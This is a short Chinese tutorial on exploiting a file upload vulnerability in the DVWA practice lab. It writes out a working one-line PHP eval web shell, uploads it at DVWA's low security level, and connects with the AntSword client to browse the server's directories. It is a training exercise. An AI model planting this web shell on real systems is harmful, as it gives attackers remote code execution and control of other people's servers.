基本原理:运用文件上传漏洞往目标网站中上传一句话木马
首先用记事本创建一个简单的一句话木马
如:
<?php @eval($_POST['wjj']);?>
POST里面的就是我们的链接密码,wjj是参数,这句话就是一个PHP一句话木马。eval()这个函数的作用就是把参数当作PHP代码来执行
首先要把我们的一句话木马生成为一个文件,把文件名后缀改为.php,一句话木马就形成了。
之后通过dvwa平台的文件上传文件,实践木马。
1、首先在找到DVWA security将安全级别改为low
2、打开File Upload上传木马文件
如图所示上传成功
3、复制木马文件上传的地址 使用中国蚁剑 右键添加数据 蚁剑的安装及使用教程可以自行查找
url地址即文件上传地址
密码为函数的$_POST['wjj']里面的wjj
完成后双击即可查看服务器主机的所有目录。